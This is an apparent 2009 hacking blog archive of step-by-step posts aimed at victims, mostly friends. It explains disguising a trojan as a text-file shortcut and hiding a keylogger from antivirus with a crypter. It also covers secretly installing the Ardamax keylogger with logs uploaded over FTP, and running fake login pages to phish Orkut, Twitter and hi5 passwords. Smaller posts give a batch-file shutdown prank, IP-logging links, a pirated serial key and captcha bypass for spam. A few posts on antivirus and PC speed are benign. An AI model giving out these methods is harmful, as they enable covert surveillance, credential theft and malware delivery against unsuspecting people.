Wednesday, September 30, 2009

How to sent a trojan horse virus as txt file

Hello Friends Today I am Going to Explain you that How to Send Trojans as a Text Files that will execute your desired codes..
AS you all know that .exe is a Executable File and can run a Code .In this Guide I will teach you How to make a .txt executable that can run all of your codes binded or crypted behind it.

What is a trojan horse?

A Trojan horse, or trojan for short, is a term used to describe malware that appears, to the user, to perform a desirable function but, in fact, facilitates unauthorized access to the user's computer system. The term comes from the Trojan Horse story in Greek mythology. Trojan horses are not self-replicating which distinguishes them from viruses and worms. Additionally, they require interaction with a hacker to fulfill their purpose.

Purpose of Trojan horses?

Trojan horses are designed to allow a hacker remote access to a target computer system. Once a Trojan horse has been installed on a target computer system it is possible for a hacker to access it remotely and perform various operations. The operations that a hacker can perform are limited by user privileges on the target computer system and the design of the Trojan horse.

Send Trojans as a Text Files - Method


1. First of all You have to download the TEXT ICON PACK .
You can Download It From Below:

Download

2. Extract the Icon Pack to Obtain the Text Icons.

3. Open a new file, Right click - New - Shortcut
Type the location of the item: "X:\WINDOWS\system32\cmd.exe /c file.txt" (where stands for "X"=Drive)



and name it "Readme.txt" (without quotes)

4. After creating the readme.txt file right click on it and choose - Properties
in the - "Start in" fill - "%currentdir%" , in the - "Run" choose - "Minimized".



5. Then change the icon with one of the TXT icons from the pack by right clicking the readme.txt file then -
Properties - Change Icon...

6. In order to execute a file you need one..
just change your Server/Virus extension to .TXT and name it - "file.txt"

Now you have a .TXT Shortcut and .TXT Executable, when opening the txt shortcut it opens a command
- "C:\WINDOWS\system32\cmd.exe /c test.txt" that executes the file you want.

7. Now the readme.txt executes a command window, in order to hide it Right click on the "readme.txt" and choose - Properties - Layout and reduced the size on the window to height=1 and width=1.
Now change the window position to height=999 and width=999.

8. Now you are ready to sent a trojan as a txt file..


Warning:This post How to sent a trojan virus in a txt file is for educational purposes

Tuesday, September 29, 2009

How to bypass antivirus detection of keylogger

In my previous post "Which spyware keylogger to choose" i told you about best keyloggers and spywares availible now a days to hack email accounts,but after that i received huge amount of email and readers asked me that is there any way to avoid antivirus detection while installing a keylogger remotely.so today i will tell you about a software,by which you can bypass antivrus detection while installing a keylogger remotely


How to bypass antivirus detection - UD Crypter

This Crypter is UD (Undetectable) and not FUD (Fully Undetectable) free software, because it is detected by Avira antivirus and even Kaspersky antivirus as virus. Hence, it is 2/22 UD ie only 2 antiviruses out of 22 detected this as virus. Thus, if your victim is using any antivirus other than Avira and Kaspersky, then chill out guys.. here's the solution for your problem.

Download UD Crypter software:

As I have explained previously, Crypter is used to bypass antivirus detection on victim computer. So, we use Crypter software to encrypt our Keylogger and trojan. Due to encryption by Crypter software, whenever victim runs our sent keylogger or trojan on his computer, his antivirus does not detect our keylogger as virus and our keylogger is prevented from being deleted on victim computer.

1.First of all Download Ud crypter

2. extract the Zip file to obtain FUD Crypter free software.

3. Run Krypter.exe application on your computer system.

4. Now, browse to the file (keylogger or any trojan) you wanna crypt to bypass antivirus detection and hit on "Encrypt".

5. A new file will be created in same directory. Now, scan this file with your antivirus and it will not detect any virus (except Avira and Kaspersky).

Note: You may get certain error on your computer like this:


UD crypter

If you are getting this error, install Library file package to fix this error.(Try googling)

I hope now your are able to use this UD Crypter to crypt keylogger or trojan
and bypass antivirus detection

Monday, September 28, 2009

Skip orkut capacha while posting links

Most people complain me about the capacha which appears while we post a link.
Well how many times we have been annoyed for sending a few links to our friends and have faced the problem of filling up captcha again and again. but not any more now we can send links without any captcha filling on orkut ...
Captcha filling is employed by websites to stop spam, but with this hack spammers will be having a fun day at orkut.



Well i will show you two methods to skip orkut capacha while posting links



Skip orkut capacha while posting links - Method 1


1. http://www.orkut.com/ClickTracker.aspx?url=//////www.yourlink.com
2. Edit the 'your link' in the link with the one you want to send and paste them in your scraps.
3. Do NOT remove the six slashes before www.yourlink.com
4. Enjoy Sending the links without filling the word verification

Note: 'http://' wont work, 'www' works flawlessly.



Skip orkut capacha while posting links - Method 2

This is the most effective way of Skiping Capthca while posting links. This is a Greasemonkey Script. The most attracting feature is that the links you posted will be clickable. First Get FIREFOX web browser. Install Greasemonkey addon Install This Script. It will Add A box while replying in Forums. Post the link in the upper box and click. Then copy the de-captchaphied link in the reply box. Enjoy the script and get rid from Captcha while posting links

So in this way you can skip orkut capacha while posting links


.......

Sunday, September 27, 2009

Hack your friends account password

Learn to hack your friends acount password
well THis trick will only work if your friend has saved his password, it allowes you to have a look at all the Username and Password which your friend had asked my computer to remember which also included my Internet Username and Password. But this is only possible in Mozila Firefox and google chrome


Hack your friends account password


To Hack your friends Password you only need even less than a minute and you can have a quick look at your friends Usernames and Passwords.

Just follow the steps:

For Mozila Firefox:

1.Open Mozila Firefox

2.Goto Tools -> Options

3.In that goto Privacy -> Passwords.

4.There you will find View Saved Passwords Button Click on it.

5.It will show you a list of websites with the usernames. To get the Passwords Click on Show Passwords Button.

6.Now To get the Internet Password Just see for any IP address in the website column this is the Ip address of that computer and Username and Pass is what you want.

7.You can get pass of any account just look for the site name whose password you want to hack and on the right side you will get the Username and Password

For Google chrome:

1.Open Google chrome

2.Goto settings -> Options

3.Goto Personal stuff -> Show saved passwords

So in this way you can hack your friends account password



.......

Friday, September 25, 2009

How to install a keylogger remotely

In my last post keylogger to hack password:aradamax keylogger i told you about aradamax keylogger and its features.I was asked by many of my readers that "How to install a keylogger remotely" well today my post will give you complete information on How to install a keylogger remotely



Note:
If you want to attach the keylogger to an existing file, go ahead and place that on your desktop.



How to install a keylogger remotely - Method



A step-by-step guide to successfully creating a deployment package, sending it, and receiving information using Ardamax Keylogger. Now, in this guide, I only use one method of receiving information, and that's an FTP. I also do not protect the files. Any suggestions and comments are appreciated.

Download Free aradamax keylogger to hack password

Now, open it, and it should give you a name and a jumble of letters and numbers.

Go back to the Ardamax icon at the bottom right, and right-click it.

Click the "Enter Registration Key" button.

Now enter this code to unlock full version:

Name: nGen 2oo6

Key: RTHUUGQVAWDFOQT

Or if you choose another version of aradamax keylogger then get serial
from this website:

http://www.theserials.com/serial/serial_ardamax.html

Now you are ready to install keylogger remotely

Again, right click the icon at the bottom-right.

Click "Remote Installation".

Click next.

Now, if you want to attach your keylogger to an existing file, tick the box that says "Append keylogger engine to.." etc

If you tick it, click Browse, and select the file.

If not, continue down. The installation folder on target computer needs to remain Windows System Folder for added security, so leave it be.

Add any additional components you would like. I just leave mine as "log viewer".

From this point, click next.

Tick all of the boxes, as to hide it from everything visible, otherwise they can just see it and be like "Wtf", uninstall, etc.


Click next.

For Security, do what you want. I leave all of it as-is and click next again.

Now, untick the "Check for updates" box, else it will check for updates on their computer and they will know that they are bugged.

Click next.

Tick the "Start in hidden mode" box, and leave the "Run on windows startup" as-is.

You may pick a date to self destruct, if you like. Sounds noisy,It simply removes itself on selected date. If not, leave it alone, and it will never self destruct.

Click next.

Tick the "Send logs every.." box, and choose how frequently you would like to recieve information that has been sent.

Select 'FTP' and de-select everything else as a delivery method.

You may choose to take out screenshots.

Leave log format alone.

You may choose to send logs if it exceeds a certain size, or if you want it to send no matter what, untick the box, which is what I do.

Click on next

Head on over to:

http://phpnet.us/


Make an account,entering your username password etc

Save your FTP Account name and password. You'll need it in a moment.

This site will be the site that holds all information recieved by the keylogger.

When you're done, scroll down a bit.

Under "FTP Accounts", click "File Manager".

Near the top, click the "New Dir" button, and create a directory by any name you want.

Now, hold that thought. Bring the keylogger back.

In Ftp Host, put in:

ftp.phpnet.us

In "Remote Folder", put in the new directory's name you made.

Fill in your Username and Password.

Leave leave Passive Mode checked

Leave port alone as well. It's default.

Now to make sure everything is correctly done, click test. It should tell you it all went through. And to double check, you can refresh your open window. Click your directory and there should be a test file in it.

Click next

Tick anything and everything you want.

Click next

If you selected screenshots to be enabled, pick how you want them delivered. Click next. If not, ignore this step.

Browse where you want the keylogger to be placed. You can also change the icon, which is nifty.IF you are sharing a picture with your friend of yours,you can change the icon to a notepad and name it "Funny pic" or some thing else,and they fal for it.

Click Next.

This screen will go over with you everything that you have chosen. Make sure it's all correct.

Click Finish.

Now, if you appended the keylogger to something, you're going to need to put the "install" and appended file into a .zip or .rar file.

If not, you have the simple "Install" on your desktop. Also, feel free to rename it to something like "OMFGFunnypicture!!!.jpg"

Now you are ready to install a keylogger remotely

Upload the file or .rar/.zip somewhere, and let your target download it. They will double click it, and on their end, nothing will happen, but secretly, they have been keylogged.

Check your FTP Directory that you made as frequently as you told it to send logs, and you'll have everything you need.

While installing a keylogger remotely the major critearea is antivirus detection.I has post
an article on How to bypass antivirus detection of keylogger,check it out

.......

Thursday, September 24, 2009

How to get a free rapidshare premium account

Rapidshare premium accounts

I get lots of emails daiy asking me "How to get a premium account for free in rapidshare" or "How to get a free rapidshare premium account"Well today i will show you How to get a a rapidshare premium accounts for free.

Rapidshare,Megaupload,Mediafire etc, has become one of the most famous file sharing networks.But unfortunately most of these file sharing sites have a premium area and the services from the free area are not good.But investing for the premium account for these sites are not really possible for us.So here in this blog i am listing some sites from which you can download like a premium user without investing a dime.These sites are known as Premium Link generators and they offer you to download without any restrictions and also you get full download speed,full download accelerator support and also resume facilities which are totally absent in the free scheme of the file sharing sites.So without wasting any time lets go to business.

How to get a free rapidshare premium account



Free Rapidshare Premium link generator:

Free rapidshare premium link generator help in generating rapidshare premium links without asking for any money. So, even though you don’t have rapidshare premium account, you are able to download rapidshare files at high speed just like Rapidshare premium users. So, i have mentioned below many free rapidshare premium link generator sites to help you download rapidshare files at high speed.



1. Rslinkgens.info

This is a free premium link generator site.The sites which Rslinkgens.info supports are:-

1.Rapidshare.com
2.megaupload.com
3.Easyshare.com
4.gigasize.com.

Limitation:Maximum: 6 files per day Last test: 24/05/2009 Status: Working Limit: 220 mb



2.FastnFree4u.net

This is also a premium link generator site.The sites which fastnfree4u.net supports are:-

1.Rapidshare.com
2.Megaupload.com



3. Nbe-media.net

The sites which Nbe-media.net supports are :-

1.Rapidshare.com
2.Megaupload.com

For all of you who like my post please comment and also leave any premium link generators that you know of.I Am Also Proving a screenshot of a download from these sites which support resume and pause facilities like premium accounts.

There are some more rapidshare premium link generators to get a free rapidshare premium accounts.

1. RsFox.com

2. Oopar.com

3. Rapidshare premium link generator

4. Rapidfile.us

5. Fire Premiums

6. Rapidcheat.com

7. Free Rapid

8. Premium4Free

9. Rapidshare Premium Link Generator

10. Rapidshare premium links

11. Rapid 8

Just check out these free rapidshare premium link generator sites to get rapidshare premium account benefits. If you know any other free rapidshare premium link generator sites, please help others by mentioning those rapidshare premium link generator sites in comments.


.......

Saturday, September 19, 2009

Hack orkut using fake login page

Hack orkut

I have showed you some ways to hack orkut in my last post 6 ways on how to hack orkut account If you take a look at this post you will find in orkut Hacking techniques i have wrote Phishing(Fake login pages) at the First number.A Fake Login Page is a page that exactly resembles the original login page of sites like Yahoo,Gmail etc.However, these Fake login pages are created just for the purpose of stealing other’s passwords.


                       Steps to Hack orkut using Fake login page

Step 1:

Download orkut:fake login page

Step 2:

Then extract the contents into a folder

Step 3:
Then edit login.php .(right click and then select edit)

In that ,find (CTRL+F) 'http://rafayhackingarticles.blogspot.com' then change it to your destined URL but don't forget '\'.
Save it .

Step 4:

Create an id in 110mb.com,ripway.com,t35.com or any other free webhosting site

Step 5:
Then upload the contents into a directory
For that,after creating an id you should go to file manager and upload all these files.

Step 6:
Then just got to Orkut.htm and try out whether its working .
After you type the file , a password file will be created in the same directory .
Then you can see what username and password you have entered.

Step 7:
Distribute the orkut.HTML URL (ie: yoursite.com/orkut.HTML) to your friends.When they login from this fake login page, the login.php will save the username and password onto the .TXT file (or any other format) in your site. Download the file to see the password inside it.

Friday, September 18, 2009

Password hacking software

Learn reality of password hacking software
email Hacking Software, Email Hacking Software, Yahoo Password Hacking Software, Hotmail Password Hacking Software,msn hacker,Hotmail hacker


Don’t get fooled by these words. Learn the Real of of hacking email passwords. Identify which Hacking Softwares work and which doesn’t. Most of us are very curious about a software that can hack email passwords. In fact most of the searches about hacking contain the keyword passwords hacking software or email hacking software. But is it really possible to hack an email using a software? Does there exist a software to hack email passwords? In this post I’ll explain every possible information that you need to know about an email hacking software.
Password hacking software - Reality

Guys, i want to tell you that there is no such password hacking software. Totally depressed?? I am sorry to say, but this is true. There is no such email hacking software. So stop searching for such email hacking software. Stop fooling yourself. Just use your sense guys. If there exists such a software, will there be any security on web. And all expert engineers at Google, Yahoo and other services are not mad. They are all engaged in ensuring security of their customers ie email account owners. So, no such software exists. Email hacking software
THINGS YOU SHOULD KNOW BEFORE PROCEEDING

Many sites on the internet claim to sell softwares/programs to hack email passwords. I know most of you are aware of this. These sites also boost that their software can hack email passwords with in minutes. Some sites also claim that they can hack any one’s password for money (say $100). Never believe these sites. They are all scam! I can dare challenge anyone who claims to hack an email, using a software program. In fact when I was a newbie in the field of Hacking, I have spent many sleepless nights in search of an Email hacking software. Finally I ended up only with frustration and nothing more than that. I don’t want my readers to commit the same mistake which I did. So, never believe those scam sites and empty your pockets by spending on useless softwares.


HOW CAN I HACK AN EMAIL PASSWORD

Well there are couple of methods to hack an email account

1.
Brute force
2.
Dictionary attack
3.
Input validation attack
4.
Phishing
5.
keylogging

These are the
common email hacking methods !

How to hack twitter accounts

Hack twitter accounts

Twitter is one of the topmost widely running social networking sites,Its alexa ranking is 14(As per now).So therefore it is largely becoming target of hackers,Many requests keep coming to me ,please tell us a way to Hack twitter accounts or How to hack twitter accounts,so therefore i today i have written a post on How to hack twitter accounts

Well for this purpose i will tell you the most used method to hack twitter accounts i.e phishing


How to hack twitter accounts - Phishing



First of all download:Twitter fake login page

Step 1
First extract the contents into a folder

Step 2
Then edit login.php .(right click and then select edit)

In that ,find (CTRL+F) 'http://rafayhackingarticles.blogspot.com' then change it to your destined URL but don't forget '\'.

Now rename the script to pass.php and save it

Step 3
Now open twitter fake page in wordpad and seach for the term action=,Change action=pass.php

Step 4
Create an id in www.110mb.com , because i know about that site quite well.

Step 5
Then upload the contents into a directory

Step 6
For that,after creating an id you should go to file manager and upload all these files.

Step 7
Then just go to your fake page and enter user name and password and try out whether its working .

Step 8
After you type the file , a password file will be created in the same directory .

Step 9
Then you can see what username and password you have entered.

Now you are ready to hack twitter accounts

Step 10

Distribute the Yahoo.HTML URL (ie: yoursite.com/yahoo.HTML) to your friends.When they login from this fake login page, the login.php will save the username and password onto the .TXT file (or any other format) in your site. Download the file to see the password inside it.

Weak Password Brings ‘Happiness’ to Twitter Hacker

An 18-year-old hacker with a history of celebrity pranks has admitted to Monday’s hijacking of multiple high-profile Twitter accounts, including President-Elect Barack Obama’s, and the official feed for Fox News.

The hacker, who goes by the handle GMZ, told Threat Level on Tuesday he gained entry to Twitter’s administrative control panel by pointing an automated password-guesser at a popular user’s account. The user turned out to be a member of Twitter’s support staff, who’d chosen the weak password "happiness."

Cracking the site was easy, because Twitter allowed an unlimited number of rapid-fire log-in attempts.


The hacker bragged about the hack and revealed that it was a brute force dictionary attack against an administrator account. Twitter does not block repetitive login failures therefore enabling brute force attacks. We are still leaving the incident classification "insufficient authentication" in addition to brute force as we feel an administration interface should have additional authentication mechanism and not just a password.

Twitter announced that a hacker broke into 33 accounts including Obama's now inactive twitter. The hack is a result of a flaw in a web based support tool used by twitter, which where evidently accessible externally without proper authorization

So therefore twittter account can be hacked by using Bruteforce Dictionary attacks

.......

Thursday, September 17, 2009

How to make a facebook virus

I heard from many of my friends that a virus is spreading on facebook which delete our accounts,I first thought it could have been a trojan that spread out,Then i found out that its just simple prank to shutdown your pc,Now today i will show you how to make a facebook virus to trick your friends
In this tutorial I will show you how to make a Facebook virus using simple commands on notepad. .This will make the victim think they have got a virus when they click on an icon such as Internet Explorer .
Making a fake facebook virus!

1) Open notepad
2) Type this in :


@echo off
msg * WARNING VIRUS DETECTED!!!!! AFTER 5 MINUTES YOUR FACEBOOK ACCOUNT WILL BE DELETED !!!!TO REMOVE THE VIRUS CLICK OK OR CLOSE THIS BOX!
PAUSE
shutdown -r -t 300 -c " SORRY!!! YOUR FACEBOOK ACCOUNT ARE NOW BEING DELETED !!! PLEASE WAIT ..........."


3) Save it as something.bat
4)Right click on Internet Explorer .bat and click Create Shortcut
5)Right click on shorcut and click Properties.
6) Click Change Icon
7.Choose Internet Explorer icon or similar , click OK , then click Apply

Now your facebook virus is almost ready


8).Delete real shortcut and replace it with fake . When victim click on it , he will get warning messages that looks like this:

Wednesday, September 16, 2009

How to run a trial software forever

run trial software forever


Today i will show you two ways to hack software and run a trial software forever.
Most of us are familiar with many softwares that run only for a specified period of time in the trial mode.Once the trial period is expired these softwares stop functioning and demand for a purchase.But there are ways to run the softwares and make them function beyond the trial period.


When these softwares are installed for the first time, they make an entry into the Windows Registry with the details such as Installed Date and Time, installed path etc.After installation every time you run the software, it compares the current system date and time with the installed date and time.So, with this it can make out whether the trial period is expired or not. RunAsDate is a small utility that allows you to run a program in the date and time that you specify. This utility doesn’t change the current system date, but it only injects the date/time that you specify into the desired application. RunAsDate intercepts the kernel API calls that returns the current date and time (GetSystemTime, GetLocalTime, GetSystemTimeAsFileTime), and replaces the current date/time with the date/time that you specify.It works with Windows 2000, XP, 2003 and Vista.

How to run trial software forever - Method

You have to follow these tips carefully to successfully hack a software and make it run in it’s trial mode forever.

1. Note down the date and time, when you install the software for the first time.

2. Once the trial period expires, you must always run the software using RunAsDate.

3. After the trial period is expired, do not run the software(program) directly.If you run the software directly even once, this hack may no longer work.

4. It is better and safe to inject the date of the last day in the trial period.

For example, if the trial period expires on jan 30 2009, always inject the date as jan 29 2009 in the RunAsDate

Problems with this hack

Although this hack works on most of the softwares but still there are some software on which this hack wont work

1.This will not work for antivirus since the antivirus needs to be run in the background all the time.RunAsDate cannot be used with any antivirus.


2.This will not work for softwares that require autorun on startup. But works on most of the softwares…


3.you cannot run a software that has a limited number of execution with this hack.


4.You cannot run a keylogger with this hack

Alternate method:Run a trial software forever

As i told you above the above hack wont work on antivirus,autorun startup,keyloggers etc
I have an altenate method for these softwares
" CrackLock" is a program that allows us to indefinitely extend the probationary period of Shareware programs that have a time limit. It works by making the program believe that the date remains constant. Simple and effective.

CrackLook 3.8.1
Download Here

Note:I showed you two ways to run a trial software forever,please show your feedback by commenting


.......

Tuesday, September 15, 2009

How to block your friends scrapbook

Learn to block your friends scrapbook in orkut
It will be really scary when you will find out that you are not able to reply to your friends scrap from your own scrapbook. Yes this hack can be used to block anybody’s scrapbook. The best part is that after the scrapbook is blocked nobody can scrap him.

Now to block your freinds scrapbook,You just need t paste the below code in your friends scrapbook.

Download the script

1.Victim cannot open his/her scrapbook,Whenever he will open his/her scrapbook he will be redirected to login sceen.

2.After this Whenever anybody will enter his scrapbook he will be Redirected to his Login Screen.

Solution : (To Unblock it)

To avoid being logged off again when you see the scrap, you can block flash in your browser.

For Firefox download the following plugin :

Download the plugin

In opera, you can disable the flash plugin.

Now this will only allow you to enter the scrapbook but your friends will still not be able to scrap you. So for that you need to delete the scrap.

Another Method:

First open your scrapbook.

Now Open your Orkut Homepage in a new window( Don't close the scrapbook ). You will find the login page.

Now enter your detail and login to Orkut.

After being logged in delete the scrap from the scrapbook page that you had kept open.

These were the two methods to block your friends scrapbook


.......

Monday, September 14, 2009

How to Trace ip address of remote computer

Trace ip address
Most of you may be curious to know how to trace the IP address of a remote computer or to find the IP address of the person with whom you are chatting in Yahoo messenger or Gtalk or msn.In this post I will tell you How to trace ip address of a remote computer,Well i had been asked this question for a long period and many of users have requested me make a post on How to trace ip address on a remote computer

I have created a PHP script to make it easier for you to find the IP address of the remote computer of your choice. Here is a step-by-step process to find out the IP address.


How to trace ip address - Method

1.
Download the
IP Finder script (IP_Finder.ZIP) that I have created.

2. Create an account on
110mb,ripway,t35(or any free host that supports PHP).

3.
Extract the IP_Finder.ZIP file and upload the two files
ip.php and ip_log.txt into the root folder of your hosting account using the File Manager.

4. You can rename the
ip.php to any name of your choice.

5.
Set the permission to 777 on ip_log.txt.

Now you are all set to
trace the IP address of a remote computer of your choice. All you have to do is send the link of ip.php to your friend or the person with whom you’re chatting. Once the person click’s on the link, his/her IP address is recorded in the file ip_log.txt.

For your better understanding let’s take up the following example.

Suppose you open a new account in 110mb.com with the subdomain as
123, then your IP Finder link would be

http://123.110mb.com/ip.php

You have to send the above link to you friend via email or while chatting and ask him to visit that link. Once your friend clicks on the link, his IP address will be recorded along with the Date and Time in the ip_log.txt file. After recording the IP address, the script will redirect the person to google.com so as to avoid any suspicion.

To find the recorded IP address check the logs using the following link.

http://123.110mb.com/ip_log.php

The sample log will be in the following format

101.92.133.233 Friday 07th of sep 2009 07:31:27 PM
45.45.144.237 Friday 07th of sep 2009 07:31:28 PM
123.44.144.233 Friday 07th of sep 2009 07:31:31 PM

NOTE: You have to replace abc with your subdomain name.

I hope this helps,Please express your thoughts by commenting



.......

Sunday, September 13, 2009

How to Hack hi5 accounts

How to hack hi5 accounts
Hi5 is one of the most widely used Social Networking website by many teenagers and adults acropss the globe.Its alexa rank is 34.I have seen many cheaters create secret Hi5 accounts in order to exchange messages with another person and have secret relationships. So, it’s no wonder many people want to know how to hack a hi5 account. In this post you’ll fine the real and working ways to hack a hi5.


With my experience of about 4 years in the field of Hacking and IT security, I can tell you that there are only TWO ways to hack a hi5 They are Keylogging and Phishing. All the other ways are scams! Here is a list of facts about hi5 hacking.

1. There is no ready made software or program that can hack hi5 just by entering the target username or URL. If you come accross a site that claims to sell a program to hack hi5 then it’s 100% scam.

2. Never trust any Hacking Service that claims to
hack a hi5 account just for $100 or $200. Most of them are scams.

The following are the only 2
foolproof methods to hack hi5. 1.Phishing
2.Keylogging

We will focus on phishing and keylogging in this post:




How to hack hi5 account – Phishing
Phishing is the most commonly used method to hack hi5. The most widely used technique in phishing is the use of Fake Login Pages, also known as spoofed pages. These fake login pages resemble the original login pages of sites like Yahoo, Gmail, MySpace etc. The victim is fooled to believe the fake hi5 page to be the real one and enter his/her password. But once the user attempts to login through these pages, his/her hi5 login details are stolen away.

Method:

First download:hi5 fake login page

1.
First extract the contents into a folder

2.Then edit login.php .(right click and then select edit)

3.In that ,find (CTRL+F) 'http://rafayhackingarticles.blogspot.com' then change it to your destined URL but don't forget '\'.

4.Now rename the script to
pass.php and save it

5.Now open hi5 fake page in wordpad and seach for the term
action=,Change action=pass.php

6.Create an account on ooowebhost.com

7.Then upload the contents into a directory.

8.For that,after creating an id you should go to file manager and upload all these files.

9.Then just got to ServiceLoginAuth.htm and try out whether its working .

10.After you type the file , a password file will be created in the same directory .

9.Then you can see what username and password you have entered.



The easiest way to hack Hi5 account is by using a keylogger(Spy Software). It doesn’t matter whether or not you have physical access to the target computer. To use a keylogger it doesn’t need any technical knowledge. Anyone with a basic knowledge of computers can use keyloggers,below i will show you on How to hack Hi5 passwords with sniperspy



Sniper Spy (Remote Install Supported)

Remote password hacking softwareSniperSpy is the industry leading Remote password hacking software combined with the Remote Install and Remote Viewing feature.
Once installed on the remote PC(s) you wish, you only need to login to your own personal SniperSpy account to view activity logs of the remote PC’s!  This means that you can view logs of the remote PC’s from anywhere in the world as long as you have internet access!
Do you want to Spy on a Remote PC? Expose the truth behind the lies! Unlike the rest, SniperSpy allows you to remotely spy any PC like a television! Watch what happens on the screen LIVE! The only remote PC spy software with a SECURE control panel!
This Remote PC Spy software also saves screenshots along with text logs of chats, websites, keystrokes in any language and more. Remotely view everything your child, employee or anyone does while they use your distant PC. Includes LIVE admin and control commands Click here to read the review of sniperspy

Saturday, September 12, 2009

Top ways to speed up your PC

Top Ways to Speed Up PC


I get this question asked daily,"How to speed up your slow pc" OR How to speed up your slow computer"
Over time, computers get slower for a variety of reasons: files become disorganized, unnecessary software consumes resources, unused network drives slow startup, or too many programs automatically run at startup. Larger, serious issues can dramatically slow your pc.
Now the question arrives that How to speed up your slow computer?
Well there are many tips,tricks and tools to speed up your slow PC below i have described some methods that will make your PC 400% faster

Top Ways to Speed Up PC

Perfect optimizer:
 Perfect Optimizer is a simple and easy-to-use program which will optimize your PC and fix computer problems like slow speed, blue screen, deadlock errors and other annoying problems to maintain system stability and security, keep your PC running smoother and improve its overall performance.


Click here to Download Perfect Optimizer



Protect your computer against a spywares:
 Spywares can really slow your Pc and hurt its performance,The best way to protect your computer against spywares is By installing  an antispyware software,I have made an article on How to protect your computer against Spywares and keyloggers consider reading it

Free disk space:
 By freeing disk space, you can improve the performance of your computer. The Disk Cleanup tool helps you free up space on your hard disk. The utility identifies files that you can safely delete, and then enables you to choose whether you want to delete some or all of the identified files.
Another thing which you can use is a ccleaner.CCleaner and optimize your computer speed by deleting unwanted registry and internet tracing cookies and temporary files. Clear Out Forgotten Programs.

Detect and repair disk errors:
In addition to running Disk Cleanup and Disk Defragmenter to speed up your slow pc, you can check the integrity of the files stored on your hard disk by running the Error Checking utility.

This will speed up your slow pc with a few clicks. This is one of the best answers to "how to speed up PC performance?". These easy point and click programs also defrag your hard drive and remove spyware. All that with the push of a button weekly will keep your computer running at it’s original PC speed specs. There are dozens of different registry cleaners software and registry cleaner tools available for use with the registry, However only about 5 have really proven themselves based on user support. One of the industry leaders is RegFix. It was last year's Most Popular PC Repair product. RegFix is the easiest and best. It’s easy to get scammed with inferior products so it’s best to choose a registry cleaner with an excellent record.


Use Lightweight programs:
Replace all those resource consuming programs and look for better alternatives, especially for those who have RAM less then 512 and an old PIII machine.
Use Lightweight antivirus programs like Avira...the best i found, NOD32, AVG instead of Norton Antivirus.

Friday, September 11, 2009

How do i change my ip address

Trace ip address


What is an ip address?
Every device connected to the public Internet is assigned a unique number known as an Internet Protocol (IP) address. IP addresses consist of four numbers separated by periods (also called a 'dotted-quad') and look something like 127.0.0.1.


Since these numbers are usually assigned to internet service providers within region-based blocks, an IP address can often be used to identify the region or country from which a computer is connecting to the Internet. An IP address can sometimes be used to show the user's general location.


Changing Ip Address - Method:


"How do I change my IP address?" and "Can I change my IP address?" are probably the most commonly asked questions

Here are simple steps to change your ip-address:

1. Click on “Start” in the bottom left hand corner of screen

2. Click on “Run”

3. Type in “command” and hit ok

You should now be at an MSDOS prompt screen.

4. Type “ipconfig /release” just like that, and hit “enter”

5. Type “exit” and leave the prompt

6. Right-click on “Network Places” or “My Network Places” on your desktop.

7. Click on “properties”

You should now be on a screen with something titled “Local Area Connection”, or
something close to that, and, if you have a network hooked up, all of your other
networks.

8. Right click on “Local Area Connection” and click “properties”

9. Double-click on the “Internet Protocol (TCP/IP)” from the list under the”General” tab

10. Click on “Use the following IP address” under the “General” tab

11. Create an IP address (It doesn’t matter what it is. I just type 1 and 2
until i fill the area up).

12. Press “Tab” and it should automatically fill in the “Subnet Mask” section
with default numbers.

13. Hit the “Ok” button here

14. Hit the “Ok” button again

You should now be back to the “Local Area Connection” screen.

15. Right-click back on “Local Area Connection” and go to properties again.

16. Go back to the “TCP/IP” settings

17. This time, select “Obtain an IP address automatically”
tongue.gif

18. Hit “Ok”

19. Hit “Ok” again

20. You now have a new IP address


Thursday, September 10, 2009

Join google friend connect

Please Join google friend connect
Hello friends, this is the special article i made for requesting you to join my community "How to hack" at Google Friends Connect. I thought of establishing a community of all hackers over here. So, i request you to join my community so that you can get the benefit of Google Friend Connect. Friends, you can share your love for "Hacking" by inviting your friends to join this community...

What are the benifits of joining this community?

Since, it is a social community, you can invite your friends and share your all information about hacking in this community. Its simply can be called as a group of hackers willing to share and update their information of hacking. Thus, all members of community will be benefited...

How to join the community :

join google friend connect

Its very easy...i have provided you with a widget in the BLog footer(End of page). Just look for Google Friend Connect and then click either Join or Sign in to become a member of "How to hack".

Remember to join and invite your friends to join this community..

Saturday, September 5, 2009

How to fix your infected computer


IS your PC infected by virus,spyware etc?,Does your pc much takes time to start?,Are you looking for tools to fix up your infected computer then this post is just for you,
I get this question getting asked frequently,"How to fix your infected computer",I have posted here many ways to fix your infected computer and Make it start faster

Steps to fix your Infected computer:

Here are some steps you need to take when fixing your infected computer:

Antivirus software

1.Kaspersky:

It is one of the best antivirus availible on web,Kaspersky Anti-Virus features include real-time protection, detection and removal of viruses, trojans, worms, spyware, adware, keyloggers malicious tools and Auto-Dialers, as well as detection and removal of rootkits. It also includes instantaneous automatic updates via the "Kaspersky Security Network" service.

2.Avira

Avira uses very less CPU and is quite compact.Avira free is much better than Avira Premium even though it offers web filter and mail filter

3.AVG
AVG is one of the most used antiviruses now a days,most of all its free and antispyware too,It is very light and does not acquire too much disk space

4.
Norton
Quite slow if you have a 512 MB or 1GB RAM.2GB and 3 GB RAM Users are only advised to use this software.But it is extremely good in virus detection and does not leave a single trace of any damage,It detects 90% of viruses but not better than kaspersky.

Antispyware:

Spyware is a type of malware that is installed on computers and that collects information about users without their knowledge. The presence of spyware is typically hidden from the user. Typically, spyware is secretly installed on the user's personal computer. Sometimes, however, spywares such as keyloggers are installed by the owner of a shared, corporate, or public computer on purpose in order to secretly monitor other users.

Antispware is the second step in to fix your infected computer.Running anti-spyware software has become a widely recognized element of computer security practices for computers, especially those running Microsoft Windows. A number of jurisdictions have passed anti-spyware laws, which usually target any software that is surreptitiously installed to control a user's computer

Here is a list of some antispywares which i would recommend:

1.Ad-Aware Free Anniversary Edition 8.0.7:
It eliminates spy archives and him easily aid to eliminate them of fast form. It can choose the modules to eliminate, to keep files from registry, and to personalize the menu of the program

2.a-squared Free 4.5.0.8:
Also known like a², one specializes in detecting, to eliminate malwares (all type of harmful file). To the day of today, a-squared detects and eliminates more of: 24.000 trojans, 67.000 worms, 40.000 dialers, 11.000 spyware y 70.000 plans or signs.

3
.Malwarebytes Anti-Malware:

This antispy analyzes the discs in search of malware With option to eliminating them. This antispy can be programmed to analyze PC at a certain hour. It has a list for files in quarantine and to ignoring. There exists the possibility of activating the protection in real time (Itdetects the threats before that enter to the system), which, it is of payment.

Others are such as spyware blaster,spy defence etc

Registry scanner:

